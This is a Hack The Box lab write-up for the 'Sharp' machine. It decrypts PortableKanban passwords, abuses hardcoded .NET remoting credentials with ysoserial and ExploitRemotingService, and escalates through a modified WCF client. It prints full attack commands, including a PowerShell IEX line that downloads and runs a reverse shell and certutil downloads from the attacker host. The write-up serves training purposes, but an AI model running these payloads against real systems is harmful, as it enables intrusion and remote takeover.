Hackthebox - Sharp Writeup

 System Summary



Initial Enumeration

Nmap scan reveals some classic Windows services open













There are some shares:

















The kanban share is publicly available:

















Enum4linux doesn't show anything valuable. 

Port 8888 seems interesting but connecting to it, it seems that it doesn't reply... 

Or better: sending to it some input it doesn't reply readable text but from tcpdump we see that it replies an Authentication failure.





It seems that there is a .NET client server  application running on it.

It's time to analyze the Kanban application in a Windows machine.

We will need a windows machine with visual studio to proceed

Opening the executable portablekanban.exe with iLSpy we can look into the code.
We can find that it stores the users and their encrypt password in the portablekanban.pk3 file.

Looking deeper we see that uses default crypto in .NET (= DES encryption) and we can also find the Initialization Vector (IV): XuVUm5fR







































And we also find the DES Key: 7ly6UznJ























Opening the file PortableKanban.pk3 we see the encrypted passwords for user lars and administrator:

























Now that we have all the pieces we can use CyberChef to find the two passwords:

























  • Administrator: G2@$btRSHJYTarg
  • Lars: G123HHrth234rRG

We can also double check them by opening the application:


















We have now access to the share \\10.10.10.219\dev which contains a couple of executables and a dll.













Opening the server.exe with iLSpy we see that it listens on port 8888 (so it's the service we discovered with nmap) and it is using .NET remoting library. 

This is a library used to execute remote operations on a server by using a client that connects and make remote calls to procedures

Opening the client.exe we see some huicy information:

  • Endpoint URL: tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint
  • Username: debug
  • Password: SharpApplicationDebugUserPassword123!






Looking on the Internet we can find a very interesting C# project from James Forshaw that can be used to send malicious content to server using .NET remoting library. 

This project is named ExploitRemotingService and can be easily found on github.

We have to get and compile it with visual studio (community edition is ok).

We will now have an executable named ExploitRemotingServices.exe that will connect to the remote service and send a specially crafted payload (we still have to build it)


User Flag

Next step is to create a proof of concept of payload, like a ping request.

We can use ysoserial, famous tool to create payloads

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c " ping 10.10.14.10"

it will output a long base64 string:


















We have to coyp/paste the payload and use it for ExploitRemotingServices.exe 

At the same time we can monitor the netowork with wireshark.

The command line is

ExploitRemotingServices.exe -s --rev=4 --password="SharpApplicationDebugUserPassword123!"  --user=debug tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw <ysoserial payload>















We are able to receive ICMP request from the sharp box: this means that our payload was executed.

Next step is to change the payload from a ping to a reverse shell

Here we need to choose a good reverse shell. After some effort we can grab a good powershell reverse shell here: https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1 

We have to customize the first line with our IP address and port. We can also rename the file to rev.txt to avoid filters.

Once done we have to start a local python http server to serve this rev.txt (the usual python http.server or SimpleHTTPServer listening on port 8000)

Then create the reverse shell with ysoserial

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c " powershell IEX (New-object net.webclient).Downloadstring('http://10.10.14.10:8000/rev.txt')"

It will output a long base64 payload that we can copy

Then we can execute a netcat listener (right window) and run again the exploit ExploitRemotingServices.exe (on the left)
























We receive a shell as user lars and we can get the user flag.

Root Flag


Once inside as lars users we can see that there is an additional service running on port 8889.
The source code is in c:\users\lars\documents\wcf

If we transfer the folder to our computer we can open it in visual studio and see the client part:


















It opens a connection and sends three request:
  • client.getdiskInfo();
  • client.getCPUInfo();
  • client.getRamInfo();

We can add a fourth request with our commands and recompile the client.

The request we can add is similar to the previous powershell command, this time we download the file rev2.txt, which is customized to create a reverse shell on port 5555


















We have to compile the client and look in the binary folder of the projects.
There will be two file WcfClient.exe and WcfRemotingLibrary.dll

We have to transfer them to the sharp box with 

certutil -urlcache -f http://10.10.14.10:8000/WcfClient.exe c:\temp\WfcClient.exe

certutil -urlcache -f http://10.10.14.10:8000/WcfRemotingLIbrary.exe c:\temp\WcfRemotingLibrary.dll


















Now we have to open a netcat on port 5555 (on the left) and execute the WcfClient.exe (on the right)

We should receive a shell as system user and then get the root flag.